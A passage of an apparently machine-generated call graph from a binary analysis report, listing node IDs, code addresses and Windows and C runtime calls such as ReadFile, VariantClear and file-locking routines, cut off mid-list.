85456->85457 85458 41e194 85456->85458 85460 41e1bb GetLastError 85457->85460 85461 41e1c3 85457->85461 85459 417f77 _xtow_s@20 46 API calls 85458->85459 85462 41e199 85459->85462 85460->85461 85461->85462 85463 417f9d __dosmaperr 46 API calls 85461->85463 85462->85433 85463->85462 85464->85418 85465->85430 85466->85422 85467->85426 85468->85430 85469->85434 85470->85433 85471->85430 85473 4149ea 85472->85473 85474 4149fe 85472->85474 85518 417f77 46 API calls __getptd_noexit 85473->85518 85476 4149fa 85474->85476 85477 41443c __flush 77 API calls 85474->85477 85490 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 85476->85490 85479 414a0a 85477->85479 85478 4149ef 85519 417f25 10 API calls _xtow_s@20 85478->85519 85491 41d8c2 85479->85491 85483 414139 _fprintf 46 API calls 85484 414a18 85483->85484 85495 41d7fe 85484->85495 85486 414a1e 85486->85476 85487 413748 _free 46 API calls 85486->85487 85487->85476 85488->85221 85489->85227 85490->85227 85492 414a12 85491->85492 85493 41d8d2 85491->85493 85492->85483 85493->85492 85494 413748 _free 46 API calls 85493->85494 85494->85492 85496 41d80a __wfsopen 85495->85496 85497 41d812 85496->85497 85498 41d82d 85496->85498 85535 417f8a 46 API calls __getptd_noexit 85497->85535 85500 41d839 85498->85500 85504 41d873 85498->85504 85537 417f8a 46 API calls __getptd_noexit 85500->85537 85502 41d817 85536 417f77 46 API calls __getptd_noexit 85502->85536 85503 41d83e 85538 417f77 46 API calls __getptd_noexit 85503->85538 85507 41ae56 ___lock_fhandle 48 API calls 85504->85507 85510 41d879 85507->85510 85508 41d81f __wfsopen 85508->85486 85509 41d846 85539 417f25 10 API calls _xtow_s@20 85509->85539 85512 41d893 85510->85512 85513 41d887 85510->85513 85540 417f77 46 API calls __getptd_noexit 85512->85540 85520 41d762 85513->85520 85516 41d88d 85541 41d8ba LeaveCriticalSection __unlock_fhandle 85516->85541 85518->85478 85519->85476 85542 41aded 85520->85542 85522 41d772 85523 41d7c8 85522->85523 85525 41d7a6 85522->85525 85526 41aded __lseeki64_nolock 46 API calls 85522->85526 85555 41ad67 47 API calls 2 library calls 85523->85555 85525->85523 85527 41aded __lseeki64_nolock 46 API calls 85525->85527 85529 41d79d 85526->85529 85530 41d7b2 CloseHandle 85527->85530 85528 41d7d0 85531 41d7f2 85528->85531 85556 417f9d 46 API calls 3 library calls 85528->85556 85532 41aded __lseeki64_nolock 46 API calls 85529->85532 85530->85523 85533 41d7be GetLastError 85530->85533 85531->85516 85532->85525 85533->85523 85535->85502 85536->85508 85537->85503 85538->85509 85539->85508 85540->85516 85541->85508 85543 41adfa 85542->85543 85545 41ae12 85542->85545 85544 417f8a __write 46 API calls 85543->85544 85546 41adff 85544->85546 85547 417f8a __write 46 API calls 85545->85547 85550 41ae51 85545->85550 85548 417f77 _xtow_s@20 46 API calls 85546->85548 85549 41ae23 85547->85549 85551 41ae07 85548->85551 85552 417f77 _xtow_s@20 46 API calls 85549->85552 85550->85522 85551->85522 85553 41ae2b 85552->85553 85554 417f25 _xtow_s@20 10 API calls 85553->85554 85554->85551 85555->85528 85556->85531 85558 414c82 __wfsopen 85557->85558 85559 414cc3 85558->85559 85560 414cbb __wfsopen 85558->85560 85565 414c96 __setmbcp_nolock 85558->85565 85561 415471 __lock_file 47 API calls 85559->85561 85560->85231 85562 414ccb 85561->85562 85570 414aba 85562->85570 85584 417f77 46 API calls __getptd_noexit 85565->85584 85566 414cb0 85585 417f25 10 API calls _xtow_s@20 85566->85585 85574 414ad8 __setmbcp_nolock 85570->85574 85576 414af2 85570->85576 85571 414ae2 85637 417f77 46 API calls __getptd_noexit 85571->85637 85573 414ae7 85638 417f25 10 API calls _xtow_s@20 85573->85638 85574->85571 85574->85576 85579 414b2d 85574->85579 85586 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 85576->85586 85578 414c38 __setmbcp_nolock 85640 417f77 46 API calls __getptd_noexit 85578->85640 85579->85576 85579->85578 85580 414139 _fprintf 46 API calls 85579->85580 85587 41dfcc 85579->85587 85617 41d8f3 85579->85617 85639 41e0c2 46 API calls 3 library calls 85579->85639 85580->85579 85584->85566 85585->85560 85586->85560 85588 41dfd8 __wfsopen 85587->85588 85589 41dfe0 85588->85589 85590 41dffb 85588->85590 85710 417f8a 46 API calls __getptd_noexit 85589->85710 85591 41e007 85590->85591 85596 41e041 85590->85596 85712 417f8a 46 API calls __getptd_noexit 85591->85712 85594 41dfe5 85711 417f77 46 API calls __getptd_noexit 85594->85711 85595 41e00c 85713 417f77 46 API calls __getptd_noexit 85595->85713 85599 41e063 85596->85599 85600 41e04e 85596->85600 85601 41ae56 ___lock_fhandle 48 API calls 85599->85601 85715 417f8a 46 API calls __getptd_noexit 85600->85715 85604 41e069 85601->85604 85602 41e014 85714 417f25 10 API calls _xtow_s@20 85602->85714 85607 41e077 85604->85607 85608 41e08b 85604->85608 85605 41e053 85716 417f77 46 API calls __getptd_noexit 85605->85716 85641 41da15 85607->85641 85717 417f77 46 API calls __getptd_noexit 85608->85717 85610 41dfed __wfsopen 85610->85579 85613 41e083 85719 41e0ba LeaveCriticalSection __unlock_fhandle 85613->85719 85614 41e090 85718 417f8a 46 API calls __getptd_noexit 85614->85718 85618 41d900 85617->85618 85623 41d915 85617->85623 85723 417f77 46 API calls __getptd_noexit 85618->85723 85620 41d910 85620->85579 85621 41d905 85724 417f25 10 API calls _xtow_s@20 85621->85724 85623->85620 85624 41d94a 85623->85624 85720 420603 85623->85720 85626 414139 _fprintf 46 API calls 85624->85626 85627 41d95e 85626->85627 85628 41dfcc __read 59 API calls 85627->85628 85629 41d965 85628->85629 85629->85620 85630 414139 _fprintf 46 API calls 85629->85630 85631 41d988 85630->85631 85631->85620 85632 414139 _fprintf 46 API calls 85631->85632 85633 41d994 85632->85633 85633->85620 85634 414139 _fprintf 46 API calls 85633->85634 85635 41d9a1 85634->85635 85636 414139 _fprintf 46 API calls 85635->85636 85636->85620 85637->85573 85638->85576 85639->85579 85640->85573 85642 41da31 85641->85642 85643 41da4c 85641->85643 85645 417f8a __write 46 API calls 85642->85645 85644 41da5b 85643->85644 85646 41da7a 85643->85646 85647 417f8a __write 46 API calls 85644->85647 85648 41da36 85645->85648 85650 41da98 85646->85650 85661 41daac 85646->85661 85649 41da60 85647->85649 85651 417f77 _xtow_s@20 46 API calls 85648->85651 85652 417f77 _xtow_s@20 46 API calls 85649->85652 85653 417f8a __write 46 API calls 85650->85653 85662 41da3e 85651->85662 85655 41da67 85652->85655 85657 41da9d 85653->85657 85654 41db02 85656 417f8a __write 46 API calls 85654->85656 85658 417f25 _xtow_s@20 10 API calls 85655->85658 85659 41db07 85656->85659 85660 417f77 _xtow_s@20 46 API calls 85657->85660 85658->85662 85663 417f77 _xtow_s@20 46 API calls 85659->85663 85664 41daa4 85660->85664 85661->85654 85661->85662 85665 41dae1 85661->85665 85667 41db1b 85661->85667 85662->85613 85663->85664 85668 417f25 _xtow_s@20 10 API calls 85664->85668 85665->85654 85666 41daec ReadFile 85665->85666 85672 41dc17 85666->85672 85673 41df8f GetLastError 85666->85673 85669 416b04 __malloc_crt 46 API calls 85667->85669 85668->85662 85671 41db31 85669->85671 85676 41db59 85671->85676 85677 41db3b 85671->85677 85672->85673 85680 41dc2b 85672->85680 85674 41de16 85673->85674 85675 41df9c 85673->85675 85684 417f9d __dosmaperr 46 API calls 85674->85684 85689 41dd9b 85674->85689 85678 417f77 _xtow_s@20 46 API calls 85675->85678 85681 420494 __lseeki64_nolock 48 API calls 85676->85681 85679 417f77 _xtow_s@20 46 API calls 85677->85679 85682 41dfa1 85678->85682 85683 41db40 85679->85683 85680->85689 85690 41dc47 85680->85690 85693 41de5b 85680->85693 85685 41db67 85681->85685 85686 417f8a __write 46 API calls 85682->85686 85687 417f8a __write 46 API calls 85683->85687 85684->85689 85685->85666 85686->85689 85687->85662 85688 413748 _free 46 API calls 85688->85662 85689->85662 85689->85688 85691 41dcab ReadFile 85690->85691 85698 41dd28 85690->85698 85695 41dcc9 GetLastError 85691->85695 85701 41dcd3 85691->85701 85692 41ded0 ReadFile 85696 41deef GetLastError 85692->85696 85702 41def9 85692->85702 85693->85689 85693->85692 85694 41ddec MultiByteToWideChar 85694->85689 85697 41de10 GetLastError 85694->85697 85695->85690 85695->85701 85696->85693 85696->85702 85697->85674 85698->85689 85699 41dda3 85698->85699 85700 41dd96 85698->85700 85706 41dd60 85698->85706 85699->85706 85707 41ddda 85699->85707 85703 417f77 _xtow_s@20 46 API calls 85700->85703 85701->85690 85704 420494 __lseeki64_nolock 48 API calls 85701->85704 85702->85693 85705 420494 __lseeki64_nolock 48 API calls 85702->85705 85703->85689 85704->85701 85705->85702 85706->85694 85708 420494 __lseeki64_nolock 48 API calls 85707->85708 85709 41dde9 85708->85709 85709->85694 85710->85594 85711->85610 85712->85595 85713->85602 85714->85610 85715->85605 85716->85602 85717->85614 85718->85613 85719->85610 85721 416b04 __malloc_crt 46 API calls 85720->85721 85722 420618 85721->85722 85722->85624 85723->85621 85724->85620 85728 4148b3 GetSystemTimeAsFileTime __aulldiv 85725->85728 85727 442c6b 85727->85234 85728->85727 85729->85242 85730->85246 85731->85246 85733 45272f __tzset_nolock _wcscpy 85732->85733 85734 414d04 61 API calls __fread_nolock 85733->85734 85735 44afef GetSystemTimeAsFileTime 85733->85735 85736 4528a4 85733->85736 85737 4150d1 81 API calls _fseek 85733->85737 85734->85733 85735->85733 85736->85156 85736->85157 85737->85733 85739 44b1bc 85738->85739 85740 44b1ca 85738->85740 85741 4149c2 116 API calls 85739->85741 85742 44b1e1 85740->85742 85743 4149c2 116 API calls 85740->85743 85744 44b1d8 85740->85744 85741->85740 85773 4321a4 85742->85773 85745 44b2db 85743->85745 85744->85184 85745->85742 85747 44b2e9 85745->85747 85749 44b2f6 85747->85749 85752 414a46 __fcloseall 82 API calls 85747->85752 85748 44b224 85750 44b253 85748->85750 85751 44b228 85748->85751 85749->85184 85777 43213d 85750->85777 85754 44b235 85751->85754 85757 414a46 __fcloseall 82 API calls 85751->85757 85752->85749 85755 44b245 85754->85755 85758 414a46 __fcloseall 82 API calls 85754->85758 85755->85184 85756 44b25a 85759 44b260 85756->85759 85760 44b289 85756->85760 85757->85754 85758->85755 85762 44b26d 85759->85762 85764 414a46 __fcloseall 82 API calls 85759->85764 85787 44b0bf 85760->85787 85765 44b27d 85762->85765 85767 414a46 __fcloseall 82 API calls 85762->85767 85763 44b28f 85796 4320f8 85763->85796 85764->85762 85765->85184 85767->85765 85769 44b2a2 85771 44b2b2 85769->85771 85772 414a46 __fcloseall 82 API calls 85769->85772 85770 414a46 __fcloseall 82 API calls 85770->85769 85771->85184 85772->85771 85774 4321cb 85773->85774 85776 4321b4 __tzset_nolock _memmove 85773->85776 85775 414d04 __fread_nolock 61 API calls 85774->85775 85775->85776 85776->85748 85778 4135bb _malloc 46 API calls 85777->85778 85779 432150 85778->85779 85780 4135bb _malloc 46 API calls 85779->85780 85781 432162 85780->85781 85782 4135bb _malloc 46 API calls 85781->85782 85783 432174 85782->85783 85784 4320f8 46 API calls 85783->85784 85785 432189 85783->85785 85786 432198 85784->85786 85785->85756 85786->85756 85788 44b18e 85787->85788 85794 44b0da 85787->85794 85806 43206e 79 API calls 85788->85806 85790 44b194 85790->85763 85791 442caf 61 API calls 85791->85794 85794->85788 85794->85791 85795 44b19d 85794->85795 85804 44b040 61 API calls 85794->85804 85805 442d48 79 API calls 85794->85805 85795->85763 85797 43210f 85796->85797 85798 432109 85796->85798 85799 432122 85797->85799 85801 413748 _free 46 API calls 85797->85801 85800 413748 _free 46 API calls 85798->85800 85802 432135 85799->85802 85803 413748 _free 46 API calls 85799->85803 85800->85797 85801->85799 85802->85769 85802->85770 85803->85802 85804->85794 85805->85794 85806->85790 85807->85085 85808->85087 85809->85107 85810->85107 85811->85107 85812->85098 85813->85107 85814->85107 85815->85112 85816->85121 85817->85120 85818->85120 85868 410160 85819->85868 85821 41012f GetFullPathNameW 85822 410147 ctype 85821->85822 85822->84941 85824 4102cb SHGetDesktopFolder 85823->85824 85827 410333 _wcsncpy 85823->85827 85825 4102e0 _wcsncpy 85824->85825 85824->85827 85826 41031c SHGetPathFromIDListW 85825->85826 85825->85827 85826->85827 85827->84945 85829 4101bb 85828->85829 85834 425f4a 85828->85834 85830 410160 52 API calls 85829->85830 85831 4101c7 85830->85831 85872 410200 52 API calls 2 library calls 85831->85872 85832 4114ab __wcsicoll 58 API calls 85832->85834 85834->85832 85836 425f6e 85834->85836 85835 4101d6 85873 410200 52 API calls 2 library calls 85835->85873 85836->84947 85838 4101e9 85838->84947 85840 40f760 126 API calls 85839->85840 85841 40f584 85840->85841 85842 429335 85841->85842 85843 40f58c 85841->85843 85846 4528bd 118 API calls 85842->85846 85844 40f598 85843->85844 85845 429358 85843->85845 85898 4033c0 113 API calls 7 library calls 85844->85898 85899 434034 86 API calls _wprintf 85845->85899 85848 42934b 85846->85848 85851 429373 85848->85851 85852 42934f 85848->85852 85850 40f5b4 85850->84943 85854 4115d7 52 API calls 85851->85854 85855 431e58 82 API calls 85852->85855 85853 429369 85853->85851 85867 4293c5 ctype 85854->85867 85855->85845 85856 42959c 85857 413748 _free 46 API calls 85856->85857 85858 4295a5 85857->85858 85859 431e58 82 API calls 85858->85859 85860 4295b1 85859->85860 85864 401b10 52 API calls 85864->85867 85867->85856 85867->85864 85874 444af8 85867->85874 85877 44b41c 85867->85877 85884 402780 85867->85884 85892 4022d0 85867->85892 85900 44c7dd 64 API calls 3 library calls 85867->85900 85869 410167 _wcslen 85868->85869 85870 4115d7 52 API calls 85869->85870 85871 41017e _wcscpy 85870->85871 85871->85821 85872->85835 85873->85838 85875 4115d7 52 API calls 85874->85875 85876 444b27 _memmove 85875->85876 85876->85867 85878 44b429 85877->85878 85879 4115d7 52 API calls 85878->85879 85880 44b440 85879->85880 85881 44b45e 85880->85881 85882 401b10 52 API calls 85880->85882 85881->85867 85883 44b453 85882->85883 85883->85867 85885 402790 ctype _memmove 85884->85885 85886 402827 85884->85886 85887 4115d7 52 API calls 85885->85887 85888 4115d7 52 API calls 85886->85888 85889 402797 85887->85889 85888->85885 85890 4115d7 52 API calls 85889->85890 85891 4027bd 85889->85891 85890->85891 85891->85867 85893 4022e0 85892->85893 85896 40239d 85892->85896 85894 4115d7 52 API calls 85893->85894 85893->85896 85897 402320 ctype 85893->85897 85894->85897 85895 4115d7 52 API calls 85895->85897 85896->85867 85897->85895 85897->85896 85898->85850 85899->85853 85900->85867 85902 402539 ctype 85901->85902 85903 402417 85901->85903 85902->84951 85903->85902 85904 4115d7 52 API calls 85903->85904 85905 402443 85904->85905 85906 4115d7 52 API calls 85905->85906 85908 4024b4 85906->85908 85908->85902 85909 4022d0 52 API calls 85908->85909 85930 402880 95 API calls 2 library calls 85908->85930 85909->85908 85915 401566 85910->85915 85911 401794 85931 40e9a0 90 API calls 85911->85931 85913 40167a 85914 4017c0 85913->85914 85932 45e737 90 API calls 3 library calls 85913->85932 85914->84953 85915->85911 85915->85913 85917 4010a0 52 API calls 85915->85917 85917->85915 85919 40bc70 52 API calls 85918->85919 85924 40d451 85919->85924 85920 40d50f 85935 410600 52 API calls 85920->85935 85922 40d519 85922->84956 85923 40e0a0 52 API calls 85923->85924 85924->85920 85924->85922 85924->85923 85926 401b10 52 API calls 85924->85926 85928 427c01 85924->85928 85933 40f310 53 API calls 85924->85933 85934 40d860 91 API calls 85924->85934 85926->85924 85936 45e737 90 API calls 3 library calls 85928->85936 85930->85908 85931->85913 85932->85914 85933->85924 85934->85924 85935->85922 85936->85922 85937->84969 85938->84970 85940 42c5fe 85939->85940 85955 4091c6 85939->85955 85941 40bc70 52 API calls 85940->85941 85940->85955 85942 42c64e InterlockedIncrement 85941->85942 85943 42c665 85942->85943 85948 42c697 85942->85948 85945 42c672 InterlockedDecrement Sleep InterlockedIncrement 85943->85945 85943->85948 85944 42c737 InterlockedDecrement 85946 42c74a 85944->85946 85945->85943 85945->85948 85949 408f40 VariantClear 85946->85949 85947 42c731 85947->85944 85948->85944 85948->85947 86232 408e80 85948->86232 85951 42c752 85949->85951 86241 410c60 VariantClear ctype 85951->86241 85955->85031 85956 42c6db 85957 402160 52 API calls 85956->85957 85958 42c6e5 85957->85958 86237 45340c 85 API calls 85958->86237 85960 42c6f1 86238 40d200 52 API calls 2 library calls 85960->86238 85962 42c6fb 86239 465124 53 API calls 85962->86239 85964 42c715 85965 42c76a 85964->85965 85966 42c719 85964->85966 85967 401b10 52 API calls 85965->85967 86240 46fe32 VariantClear 85966->86240 85969 42c77e 85967->85969 85970 401980 53 API calls 85969->85970 85975 42c796 85970->85975 85971 42c812 86243 46fe32 VariantClear 85971->86243 85973 42c82a InterlockedDecrement 86244 46ff07 54 API calls 85973->86244 85975->85971 85977 42c864 85975->85977 86242 40ba10 52 API calls 2 library calls 85975->86242 85976 42c849 85979 42c9ec 85976->85979 85985 408f40 VariantClear 85976->85985 85991 402780 52 API calls 85976->85991 85994 401980 53 API calls 85976->85994 86247 40a780 85976->86247 86245 45e737 90 API calls 3 library calls 85977->86245 86288 47d33e 331 API calls 85979->86288 85982 42c9fe 86289 46feb1 VariantClear VariantClear 85982->86289 85984 42c874 85987 408f40 VariantClear 85984->85987 85996 42ca59 85984->85996 85985->85976 85986 42ca08 85988 401b10 52 API calls 85986->85988 85990 42c891 85987->85990 85989 42ca15 85988->85989 85992 40c2c0 52 API calls 85989->85992 86246 410c60 VariantClear ctype 85990->86246 85991->85976 85992->85984 85994->85976 85996->85996 85998 40afc4 85997->85998 85999 40b156 85997->85999 86000 40afd5 85998->86000 86001 42d1e3 85998->86001 86299 45e737 90 API calls 3 library calls 85999->86299 86005 40a780 194 API calls 86000->86005 86022 40b11a ctype 86000->86022 86300 45e737 90 API calls 3 library calls 86001->86300 86004 40b143 86004->85031 86007 40b00a 86005->86007 86006 42d1f8 86010 408f40 VariantClear 86006->86010 86007->86006 86011 40b012 86007->86011 86009 42d4db 86009->86009 86010->86004 86012 40b04a 86011->86012 86014 42d231 VariantClear 86011->86014 86015 40b094 ctype 86011->86015 86021 40b05c ctype 86012->86021 86301 40e270 VariantClear ctype 86012->86301 86013 40b108 86013->86022 86302 40e270 VariantClear ctype 86013->86302 86014->86021 86015->86013 86017 42d425 ctype 86015->86017 86016 42d45a VariantClear 86016->86022 86017->86016 86017->86022 86020 4115d7 52 API calls 86020->86015 86021->86015 86021->86020 86022->86004 86303 45e737 90 API calls 3 library calls 86022->86303 86024 408fff 86023->86024 86036 40900d 86023->86036 86304 403ea0 52 API calls __cinit 86024->86304 86027 42c3f6 86307 45e737 90 API calls 3 library calls 86027->86307 86029 42c44a 86309 45e737 90 API calls 3 library calls 86029->86309 86030 40a780 194 API calls 86030->86036 86031 42c47b 86310 451b42 61 API calls 86031->86310 86034 42c564 86040 408f40 VariantClear 86034->86040 86036->86027 86036->86029 86036->86030 86036->86031 86036->86034 86037 42c4cb 86036->86037 86039 42c548 86036->86039 86043 409112 86036->86043 86045 4090df 86036->86045 86047 42c528 86036->86047 86049 4090ea 86036->86049 86057 4090f2 ctype 86036->86057 86306 4534e3 52 API calls 86036->86306 86308 40c4e0 194 API calls 86036->86308 86312 47faae 233 API calls 86037->86312 86315 45e737 90 API calls 3 library calls 86039->86315 86040->86057 86041 42c491 86041->86057 86311 45e737 90 API calls 3 library calls 86041->86311 86042 42c4da 86042->86057 86313 45e737 90 API calls 3 library calls 86042->86313 86043->86039 86052 40912b 86043->86052 86045->86049 86050 408e80 VariantClear 86045->86050 86314 45e737 90 API calls 3 library calls 86047->86314 86053 408f40 VariantClear 86049->86053 86050->86049 86052->86057 86305 403e10 53 API calls 86052->86305 86053->86057 86055 40914b 86056 408f40 VariantClear 86055->86056 86056->86057 86057->85031 86316 408d90 86058->86316 86060 429778 86343 410c60 VariantClear ctype 86060->86343 86062 429780 86063 408cf9 86063->86060 86064 42976c 86063->86064 86066 408d2d 86063->86066 86342 45e737 90 API calls 3 library calls 86064->86342 86332 403d10 86066->86332 86069 408d71 ctype 86069->85031 86070 408f40 VariantClear 86071 408d45 ctype 86070->86071 86071->86069 86071->86070 86074 425c87 86072->86074 86076 40d15f 86072->86076 86073 425cc7 86074->86073 86075 425ca1 TranslateAcceleratorW 86074->86075 86075->86076 86076->85031 86078 42602f 86077->86078 86081 40d17f 86077->86081 86078->85031 86079 40d18c 86079->85031 86080 42608e IsDialogMessageW 86080->86079 86080->86081 86081->86079 86081->86080 86617 430c46 GetClassLongW 86081->86617 86084 4096c6 _wcslen 86083->86084 86085 4115d7 52 API calls 86084->86085 86145 40a70c ctype _memmove 86084->86145 86086 4096fa _memmove 86085->86086 86087 4115d7 52 API calls 86086->86087 86089 40971b 86087->86089 86088 4013a0 52 API calls 86090 4297aa 86088->86090 86091 409749 CharUpperBuffW 86089->86091 86095 40976a ctype 86089->86095 86089->86145 86092 4115d7 52 API calls 86090->86092 86091->86095 86134 4297d1 _memmove 86092->86134 86141 4097e5 ctype 86095->86141 86619 47dcbb 196 API calls 86095->86619 86096 408f40 VariantClear 86097 42ae92 86096->86097 86646 410c60 VariantClear ctype 86097->86646 86099 42aea4 86100 409aa2 86102 4115d7 52 API calls 86100->86102 86107 409afe 86100->86107 86100->86134 86101 40a689 86104 4115d7 52 API calls 86101->86104 86102->86107 86103 4115d7 52 API calls 86103->86141 86124 40a6af ctype _memmove 86104->86124 86105 409b2a 86109 429dbe 86105->86109 86173 409b4d ctype _memmove 86105->86173 86627 40b400 VariantClear VariantClear ctype 86105->86627 86106 40c2c0 52 API calls 86106->86141 86107->86105 86108 4115d7 52 API calls 86107->86108 86110 429d31 86108->86110 86111 429dd3 86109->86111 86628 40b400 VariantClear VariantClear ctype 86109->86628 86115 429d42 86110->86115 86624 44a801 52 API calls 86110->86624 86111->86173 86629 40e1c0 VariantClear ctype 86111->86629 86112 429a46 VariantClear 86112->86141 86113 409fd2 86116 40a045 86113->86116 86169 42a3f5 86113->86169 86122 40e0a0 52 API calls 86115->86122 86120 4115d7 52 API calls 86116->86120 86117 408f40 VariantClear 86117->86141 86126 40a04c 86120->86126 86127 429d57 86122->86127 86131 4115d7 52 API calls 86124->86131 86132 40a0a7 86126->86132 86136 4091e0 317 API calls 86126->86136 86625 453443 52 API calls 86127->86625 86129 42a42f 86633 45e737 90 API calls 3 library calls 86129->86633 86131->86145 86155 40a0af 86132->86155 86634 40c790 VariantClear ctype 86132->86634 86133 4299d9 86137 408f40 VariantClear 86133->86137 86645 45e737 90 API calls 3 library calls 86134->86645 86136->86132 86140 4299e2 86137->86140 86138 429abd 86138->85031 86139 429d88 86626 453443 52 API calls 86139->86626 86621 410c60 VariantClear ctype 86140->86621 86141->86100 86141->86101 86141->86103 86141->86106 86141->86112 86141->86117 86141->86124 86141->86133 86141->86134 86141->86138 86147 40a780 194 API calls 86141->86147 86148 42a452 86141->86148 86620 40c4e0 194 API calls 86141->86620 86622 40ba10 52 API calls 2 library calls 86141->86622 86623 40e270 VariantClear ctype 86141->86623 86145->86088 86147->86141 86148->86096 86150 44a801 52 API calls 86150->86173 86152 408f40 VariantClear 86184 40a162 ctype _memmove 86152->86184 86153 4115d7 52 API calls 86153->86173 86154 402780 52 API calls 86154->86173 86156 40a11b 86155->86156 86157 42a4b4 VariantClear 86155->86157 86155->86184 86163 40a12d ctype 86156->86163 86635 40e270 VariantClear ctype 86156->86635 86157->86163 86158 40a780 194 API calls 86158->86173 86159 408e80 VariantClear 86159->86173 86161 401980 53 API calls 86161->86173 86162 4115d7 52 API calls 86162->86184 86163->86162 86163->86184 86165 408e80 VariantClear 86165->86184 86166 42a74d VariantClear 86166->86184 86167 41130a 51 API calls __cinit 86167->86173 86168 40a368 86170 42aad4 86168->86170 86178 40a397 86168->86178 86632 47390f VariantClear 86169->86632 86638 46fe90 VariantClear VariantClear ctype 86170->86638 86171 42a886 VariantClear 86171->86184 86172 42a7e4 VariantClear 86172->86184 86173->86113 86173->86129 86173->86145 86173->86150 86173->86153 86173->86154 86173->86158 86173->86159 86173->86161 86173->86167 86173->86169 86175 409c95 86173->86175 86630 45f508 52 API calls 86173->86630 86631 403e10 53 API calls 86173->86631 86175->85031 86176 40a3ce 86188 40a3d9 ctype 86176->86188 86639 40b400 VariantClear VariantClear ctype 86176->86639 86177 40e270 VariantClear 86177->86184 86178->86176 86203 40a42c ctype 86178->86203 86618 40b400 VariantClear VariantClear ctype 86178->86618 86181 4115d7 52 API calls 86181->86184 86182 42abaf 86186 42abd4 VariantClear 86182->86186 86194 40a4ee ctype 86182->86194 86183 4115d7 52 API calls 86187 42a5a6 VariantInit VariantCopy 86183->86187 86184->86152 86184->86165 86184->86166 86184->86168 86184->86170 86184->86171 86184->86172 86184->86177 86184->86181 86184->86183 86636 470870 52 API calls 86184->86636 86637 44ccf1 VariantClear ctype 86184->86637 86185 40a4dc 86185->86194 86641 40e270 VariantClear ctype 86185->86641 86186->86194 86187->86184 86190 42a5c6 VariantClear 86187->86190 86189 40a41a 86188->86189 86196 42ab44 VariantClear 86188->86196 86188->86203 86189->86203 86640 40e270 VariantClear ctype 86189->86640 86190->86184 86191 42ac4f 86197 42ac79 VariantClear 86191->86197 86201 40a546 ctype 86191->86201 86194->86191 86195 40a534 86194->86195 86195->86201 86642 40e270 VariantClear ctype 86195->86642 86196->86203 86197->86201 86198 42ad28 86204 42ad4e VariantClear 86198->86204 86209 40a583 ctype 86198->86209 86201->86198 86202 40a571 86201->86202 86202->86209 86643 40e270 VariantClear ctype 86202->86643 86203->86182 86203->86185 86204->86209 86206 40a650 ctype 86206->85031 86207 42ae0e VariantClear 86207->86209 86209->86206 86209->86207 86644 40e270 VariantClear ctype 86209->86644 86210->85031 86211->84980 86212->84986 86213->85031 86214->85031 86215->85031 86216->85031 86217->85037 86218->85037 86219->85037 86220->85037 86221->85037 86222->85037 86223->85037 86225 403cdf 86224->86225 86226 408f40 VariantClear 86225->86226 86227 403ce7 86226->86227 86227->85024 86228->85037 86229->85037 86230->85031 86231->84977 86233 408e88 86232->86233 86235 408e94 86232->86235 86234 408f40 VariantClear 86233->86234 86234->86235 86236 45340c 85 API calls 86235->86236 86236->85956 86237->85960 86238->85962 86239->85964 86240->85947 86241->85955 86242->85975 86243->85973 86244->85976 86245->85984 86246->85955 86248 40a7a6 86247->86248 86249 40ae8c 86247->86249 86251 4115d7 52 API calls 86248->86251 86290 41130a 51 API calls __cinit 86249->86290 86273 40a7c6 ctype _memmove 86251->86273 86252 40a86d 86253 40abd1 86252->86253 86269 40a878 ctype 86252->86269 86295 45e737 90 API calls 3 library calls 86253->86295 86254 4115d7 52 API calls 86254->86273 86255 401b10 52 API calls 86255->86273 86257 40b5f0 89 API calls 86257->86273 86258 408e80 VariantClear 86258->86273 86259 42b791 VariantClear 86259->86273 86260 408f40 VariantClear 86260->86269 86261 42ba2d VariantClear 86261->86273 86262 42b459 VariantClear 86262->86273 86263 40a884 ctype 86263->85976 86264 42b6f6 VariantClear 86264->86273 86266 40bc10 53 API calls 86266->86273 86267 408cc0 187 API calls 86267->86273 86268 42bc5b 86268->85976 86269->86260 86269->86263 86270 40e270 VariantClear 86270->86273 86271 42bbf5 86296 45e737 90 API calls 3 library calls 86271->86296 86272 42bb6a 86298 44b92d VariantClear 86272->86298 86273->86252 86273->86253 86273->86254 86273->86255 86273->86257 86273->86258 86273->86259 86273->86261 86273->86262 86273->86264 86273->86266 86273->86267 86273->86270 86273->86271 86273->86272 86274 4115d7 52 API calls 86273->86274 86276 408f40 VariantClear 86273->86276 86282 42bc37 86273->86282 86287 4530c9 VariantClear 86273->86287 86291 45308a 53 API calls 86273->86291 86292 470870 52 API calls 86273->86292 86293 457f66 87 API calls __write_nolock 86273->86293 86294 472f47 127 API calls 86273->86294 86277 42b5b3 VariantInit VariantCopy 86274->86277 86276->86273 86277->86273 86279 42b5d7 VariantClear 86277->86279 86279->86273 86297 45e737 90 API calls 3 library calls 86282->86297 86285 42bc48 86285->86272 86286 408f40 VariantClear 86285->86286 86286->86272 86287->86273 86288->85982 86289->85986 86290->86273 86291->86273 86292->86273 86293->86273 86294->86273 86295->86272 86296->86272 86297->86285 86298->86268 86299->86001 86300->86006 86301->86021 86302->86022 86303->86009 86304->86036 86305->86055 86306->86036 86307->86057 86308->86036 86309->86057 86310->86041 86311->86057 86312->86042 86313->86057 86314->86057 86315->86034 86317 4289d2 86316->86317 86318 408db3 86316->86318 86346 45e737 90 API calls 3 library calls 86317->86346 86344 40bec0 90 API calls 86318->86344 86321 408dc9 86322 4289e5 86321->86322 86325 428a05 86321->86325 86327 40a780 194 API calls 86321->86327 86328 408e5a 86321->86328 86329 408e64 86321->86329 86331 408f40 VariantClear 86321->86331 86345 40ba10 52 API calls 2 library calls 86321->86345 86347 45e737 90 API calls 3 library calls 86322->86347 86326 408f40 VariantClear 86325->86326 86326->86328 86327->86321 86328->86063 86330 408f40 VariantClear 86329->86330 86330->86328 86331->86321 86333 408f40 VariantClear 86332->86333 86334 403d20 86333->86334 86335 403cd0 VariantClear 86334->86335 86336 403d4d 86335->86336 86348 467897 86336->86348 86392 4755ad 86336->86392 86395 46e91c 86336->86395 86398 45e17d 86336->86398 86337 403d76 86337->86060 86337->86071 86342->86060 86343->86062 86344->86321 86345->86321 86346->86322 86347->86325 86349 4678bb 86348->86349 86377 467954 86349->86377 86424 45340c 85 API calls 86349->86424 86350 4115d7 52 API calls 86351 467989 86350->86351 86353 467995 86351->86353 86428 40da60 53 API calls 86351->86428 86408 4533eb 86353->86408 86354 4678f6 86356 413a0e __wsplitpath 46 API calls 86354->86356 86357 4678fc 86356->86357 86360 401b10 52 API calls 86357->86360 86362 46790c 86360->86362 86425 40d200 52 API calls 2 library calls 